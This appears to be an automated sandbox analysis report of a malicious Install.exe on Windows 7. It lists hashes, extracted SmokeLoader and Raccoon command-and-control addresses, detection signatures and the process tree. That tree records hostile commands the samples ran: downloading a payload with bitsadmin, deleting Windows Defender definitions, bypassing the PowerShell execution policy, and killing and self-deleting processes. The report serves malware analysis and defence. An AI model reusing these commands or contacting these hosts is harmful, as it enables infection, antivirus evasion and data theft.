Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    205s
  • max time network
    259s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    25-04-2021 11:06

Errors

Reason
Machine shutdown

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

16992cd33145ccbb6feeacb4e84400a56448fa14

Attributes
  • url4cnc

    https://telete.in/baudemars

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 29 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 49 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:472
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:876
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:9516
    • C:\Users\Admin\AppData\Local\Temp\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1840
      • C:\Users\Admin\AppData\Local\Temp\is-VH9M2.tmp\Install.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-VH9M2.tmp\Install.tmp" /SL5="$3015C,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:828
        • C:\Users\Admin\AppData\Local\Temp\is-MQ4S1.tmp\Ultra.exe
          "C:\Users\Admin\AppData\Local\Temp\is-MQ4S1.tmp\Ultra.exe" /S /UID=burnerch1
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:832
          • C:\Program Files\Google\OTYZBZGHFI\ultramediaburner.exe
            "C:\Program Files\Google\OTYZBZGHFI\ultramediaburner.exe" /VERYSILENT
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:808
            • C:\Users\Admin\AppData\Local\Temp\is-DGESG.tmp\ultramediaburner.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-DGESG.tmp\ultramediaburner.tmp" /SL5="$6012C,281924,62464,C:\Program Files\Google\OTYZBZGHFI\ultramediaburner.exe" /VERYSILENT
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2024
              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                6⤵
                • Executes dropped EXE
                PID:1904
          • C:\Users\Admin\AppData\Local\Temp\3f-4ff89-6f7-2f291-4330088b06b54\Lekozhusyshy.exe
            "C:\Users\Admin\AppData\Local\Temp\3f-4ff89-6f7-2f291-4330088b06b54\Lekozhusyshy.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1804
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:552
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:552 CREDAT:275457 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:948
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:552 CREDAT:340994 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:9308
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:552 CREDAT:209937 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:5540
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:552 CREDAT:341017 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:2096
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:552 CREDAT:275493 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:4208
          • C:\Users\Admin\AppData\Local\Temp\c6-562e6-042-3bb82-ede0b54f6dbf3\Nilucabiry.exe
            "C:\Users\Admin\AppData\Local\Temp\c6-562e6-042-3bb82-ede0b54f6dbf3\Nilucabiry.exe"
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1956
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\faj1smni.eev\instEU.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:7260
              • C:\Users\Admin\AppData\Local\Temp\faj1smni.eev\instEU.exe
                C:\Users\Admin\AppData\Local\Temp\faj1smni.eev\instEU.exe
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:7480
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\leh0hda4.1zv\google-game.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:9228
              • C:\Users\Admin\AppData\Local\Temp\leh0hda4.1zv\google-game.exe
                C:\Users\Admin\AppData\Local\Temp\leh0hda4.1zv\google-game.exe
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:9308
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  7⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:9396
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3zkqxfhx.aon\md1_1eaf.exe & exit
              5⤵
                PID:9908
                • C:\Users\Admin\AppData\Local\Temp\3zkqxfhx.aon\md1_1eaf.exe
                  C:\Users\Admin\AppData\Local\Temp\3zkqxfhx.aon\md1_1eaf.exe
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:9976
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2t3pxn4x.g3g\askinstall39.exe & exit
                5⤵
                  PID:3320
                  • C:\Users\Admin\AppData\Local\Temp\2t3pxn4x.g3g\askinstall39.exe
                    C:\Users\Admin\AppData\Local\Temp\2t3pxn4x.g3g\askinstall39.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4240
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      7⤵
                        PID:7456
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          8⤵
                          • Kills process with taskkill
                          PID:7712
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ib13b5gq.bzl\inst.exe & exit
                    5⤵
                      PID:7632
                      • C:\Users\Admin\AppData\Local\Temp\ib13b5gq.bzl\inst.exe
                        C:\Users\Admin\AppData\Local\Temp\ib13b5gq.bzl\inst.exe
                        6⤵
                        • Executes dropped EXE
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:7660
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y3lw5ab4.rfh\SunLabsPlayer.exe /S & exit
                      5⤵
                        PID:8396
                        • C:\Users\Admin\AppData\Local\Temp\y3lw5ab4.rfh\SunLabsPlayer.exe
                          C:\Users\Admin\AppData\Local\Temp\y3lw5ab4.rfh\SunLabsPlayer.exe /S
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:8452
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                            7⤵
                            • Drops file in Program Files directory
                            PID:8812
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                            7⤵
                              PID:5680
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                              7⤵
                                PID:5776
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                7⤵
                                  PID:3476
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                  7⤵
                                    PID:3860
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                    7⤵
                                      PID:2256
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                      7⤵
                                      • Checks for any installed AV software in registry
                                      PID:2480
                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                      7⤵
                                      • Download via BitsAdmin
                                      PID:2776
                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pA4ibSiETYDLITxK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                      7⤵
                                        PID:4300
                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -psw9hDguHVuWre2G -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                        7⤵
                                          PID:4384
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                          7⤵
                                            PID:4420
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                            7⤵
                                              PID:4132
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                              7⤵
                                                PID:4772
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:4840
                                                  • C:\Windows\SysWOW64\wermgr.exe
                                                    "C:\Windows\system32\wermgr.exe" "-outproc" "4840" "1296"
                                                    8⤵
                                                      PID:5200
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 1252
                                                      8⤵
                                                      • Program crash
                                                      PID:5212
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5264
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5276
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5280
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5284
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi8C4A.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5296
                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                              7⤵
                                                                PID:5308
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hikgv545.jpr\GcleanerWW.exe /mixone & exit
                                                            5⤵
                                                              PID:8528
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ai0w2wx3.ixn\toolspab1.exe & exit
                                                              5⤵
                                                                PID:8632
                                                                • C:\Users\Admin\AppData\Local\Temp\ai0w2wx3.ixn\toolspab1.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\ai0w2wx3.ixn\toolspab1.exe
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of SetThreadContext
                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                  PID:8664
                                                                  • C:\Users\Admin\AppData\Local\Temp\ai0w2wx3.ixn\toolspab1.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\ai0w2wx3.ixn\toolspab1.exe
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Checks SCSI registry key(s)
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:8820
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ttknl3zq.nom\c7ae36fa.exe & exit
                                                                5⤵
                                                                  PID:8700
                                                                  • C:\Users\Admin\AppData\Local\Temp\ttknl3zq.nom\c7ae36fa.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\ttknl3zq.nom\c7ae36fa.exe
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Checks SCSI registry key(s)
                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:8736
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3sgxhhyk.g1j\app.exe /8-2222 & exit
                                                                  5⤵
                                                                    PID:8764
                                                                    • C:\Users\Admin\AppData\Local\Temp\3sgxhhyk.g1j\app.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\3sgxhhyk.g1j\app.exe /8-2222
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                      PID:9248
                                                                      • C:\Users\Admin\AppData\Local\Temp\3sgxhhyk.g1j\app.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\3sgxhhyk.g1j\app.exe" /8-2222
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:9552
                                                          • C:\Users\Admin\AppData\Local\Temp\83B1.exe
                                                            C:\Users\Admin\AppData\Local\Temp\83B1.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:9812
                                                          • C:\Users\Admin\AppData\Local\Temp\85C4.exe
                                                            C:\Users\Admin\AppData\Local\Temp\85C4.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5624
                                                          • C:\Users\Admin\AppData\Local\Temp\953F.exe
                                                            C:\Users\Admin\AppData\Local\Temp\953F.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:10132
                                                            • C:\Users\Admin\AppData\Local\Temp\953F.exe
                                                              "{path}"
                                                              2⤵
                                                                PID:3328
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                  3⤵
                                                                    PID:4736
                                                              • C:\Users\Admin\AppData\Local\Temp\9C71.exe
                                                                C:\Users\Admin\AppData\Local\Temp\9C71.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:6064
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9C71.exe"
                                                                  2⤵
                                                                    PID:3164
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /T 10 /NOBREAK
                                                                      3⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:3192
                                                                • C:\Users\Admin\AppData\Local\Temp\AEAB.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\AEAB.exe
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  PID:3620
                                                                • C:\Users\Admin\AppData\Local\Temp\C95C.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\C95C.exe
                                                                  1⤵
                                                                    PID:3956
                                                                  • C:\Users\Admin\AppData\Local\Temp\D7FE.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\D7FE.exe
                                                                    1⤵
                                                                      PID:5580
                                                                    • C:\Users\Admin\AppData\Local\Temp\DA21.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\DA21.exe
                                                                      1⤵
                                                                        PID:4084
                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                          icacls "C:\Users\Admin\AppData\Local\5c510dcd-1c7c-4d67-9888-7e525916d243" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                          2⤵
                                                                          • Modifies file permissions
                                                                          PID:2412
                                                                        • C:\Users\Admin\AppData\Local\Temp\DA21.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\DA21.exe" --Admin IsNotAutoStart IsNotTask
                                                                          2⤵
                                                                            PID:2768
                                                                            • C:\Users\Admin\AppData\Local\318dae40-8a2f-4620-b56e-5239f40cec68\updatewin1.exe
                                                                              "C:\Users\Admin\AppData\Local\318dae40-8a2f-4620-b56e-5239f40cec68\updatewin1.exe"
                                                                              3⤵
                                                                                PID:5536
                                                                                • C:\Users\Admin\AppData\Local\318dae40-8a2f-4620-b56e-5239f40cec68\updatewin1.exe
                                                                                  "C:\Users\Admin\AppData\Local\318dae40-8a2f-4620-b56e-5239f40cec68\updatewin1.exe" --Admin
                                                                                  4⤵
                                                                                    PID:3244
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
                                                                                      5⤵
                                                                                        PID:3292
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"
                                                                                        5⤵
                                                                                          PID:2124
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\script.ps1
                                                                                            6⤵
                                                                                              PID:4452
                                                                                          • C:\Program Files\Windows Defender\mpcmdrun.exe
                                                                                            "C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all
                                                                                            5⤵
                                                                                            • Deletes Windows Defender Definitions
                                                                                            PID:4540
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""
                                                                                            5⤵
                                                                                              PID:5844
                                                                                        • C:\Users\Admin\AppData\Local\318dae40-8a2f-4620-b56e-5239f40cec68\updatewin2.exe
                                                                                          "C:\Users\Admin\AppData\Local\318dae40-8a2f-4620-b56e-5239f40cec68\updatewin2.exe"
                                                                                          3⤵
                                                                                            PID:3220
                                                                                          • C:\Users\Admin\AppData\Local\318dae40-8a2f-4620-b56e-5239f40cec68\5.exe
                                                                                            "C:\Users\Admin\AppData\Local\318dae40-8a2f-4620-b56e-5239f40cec68\5.exe"
                                                                                            3⤵
                                                                                              PID:4184
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\318dae40-8a2f-4620-b56e-5239f40cec68\5.exe" & del C:\ProgramData\*.dll & exit
                                                                                                4⤵
                                                                                                  PID:3308
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im 5.exe /f
                                                                                                    5⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:4556
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /t 6
                                                                                                    5⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:4708
                                                                                          • C:\Users\Admin\AppData\Local\Temp\F224.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\F224.exe
                                                                                            1⤵
                                                                                              PID:2248
                                                                                            • C:\Users\Admin\AppData\Local\Temp\48.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\48.exe
                                                                                              1⤵
                                                                                                PID:2444
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:2600
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:2532
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:2732
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:2836
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:2884
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:2924
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:2908
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
